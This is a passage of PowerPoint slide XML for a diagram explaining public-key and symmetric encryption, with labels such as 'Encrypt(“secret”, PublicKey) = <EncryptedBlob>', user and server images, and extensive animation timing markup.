        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3147342" y="6879449"/>
            <a:ext cx="806027" cy="1589476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="824" name="Public Key"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3851768" y="7218115"/>
            <a:ext cx="1133406" cy="738430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="39014" tIns="39014" rIns="39014" bIns="39014">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2200">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>Public Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="825" name="User_UserHalfE01" descr="User_UserHalfE01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9566204" y="4088835"/>
            <a:ext cx="896339" cy="1411112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="826" name="User_UserHalfA01" descr="User_UserHalfA01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436142" y="4070773"/>
            <a:ext cx="900854" cy="1422401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="827" name="Encrypt(“secret”, PublicKey) = &lt;EncryptedBlob&gt;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6060674" y="3226364"/>
            <a:ext cx="5326759" cy="342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300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Encrypt(“secret”, PublicKey) = &lt;EncryptedBlob&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="828" name="“secret”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9552658" y="3662115"/>
            <a:ext cx="859830" cy="342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400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“secret”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829" name="“secret”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2415822" y="3614702"/>
            <a:ext cx="859830" cy="342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400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“secret”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="830" name="&lt;EncryptedBlob&gt;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9523307" y="3228622"/>
            <a:ext cx="1930351" cy="342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400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>&lt;EncryptedBlob&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="831" name="Decrypt(&lt;EncryptedBlob&gt;, PrivateKey) = “secret”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1582249" y="3239911"/>
            <a:ext cx="5437635" cy="342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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Decrypt(&lt;EncryptedBlob&gt;, PrivateKey) = “secret”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="832" name="Symmetric Key"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1964266" y="3628248"/>
            <a:ext cx="1693268" cy="342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400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Symmetric Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833" name="Symmetric Key"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9103359" y="3641795"/>
            <a:ext cx="1693269" cy="342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400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Symmetric Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="834" name="Server01" descr="Server01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2327768" y="4118186"/>
            <a:ext cx="1144695" cy="134789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827"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="827"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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8" presetID="2" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="827"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="0-ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="827"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="827"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="83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xit" nodeType="clickEffect" presetID="9" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="830"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="830"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetClass="entr" nodeType="afterEffect" presetSubtype="8" presetID="2" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="831"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="831"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="831"/>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Class="exit" nodeType="clickEffect" presetSubtype="8" presetID="2" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="831"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="0-ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="831"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="831"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="829"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="829"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="38" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetClass="exit" nodeType="clickEffect" presetSubtype="4" presetID="2" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="829"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="829"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="829"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetClass="exit" nodeType="afterEffect" presetSubtype="4" presetID="2" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="828"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="828"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="828"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="50" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="2" grpId="10" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="51" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="832"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="832"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="832"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="54" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="2" grpId="11" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="833"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="833"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="833"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="59" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="60" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="2" grpId="12" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="834"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
